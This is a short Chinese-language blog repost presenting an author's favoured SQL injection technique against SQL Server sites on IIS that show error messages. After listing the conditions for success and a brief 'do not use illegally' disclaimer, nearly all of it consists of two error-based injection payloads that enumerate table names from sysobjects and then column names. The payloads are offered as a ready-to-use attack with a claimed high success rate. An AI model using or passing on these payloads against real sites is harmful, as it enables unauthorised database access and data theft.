本文共 310 字，大约阅读时间需要 1 分钟。

必殺技成功條件： 1.找到注入點 2.數據庫為SQLSERVER 3.IIS沒屏蔽錯誤提示

注：因必殺技是我研究N久的心得，經多次改良，成功率極高。請不要用於不合法用途上，否則後果自負。

[N] = 第N個表

ID=1 and (Select top 1 name from(Select top [N] idname from sysobjects where xtype=char(85)) T order by id desc)>1

[T] = 表名

[N] = 第N個字段 ID=1 and (Select Top 1 col_name(object_id([T])[N]) from sysobjects)>1

转载地址：http://ovtdzu.baihongyu.com/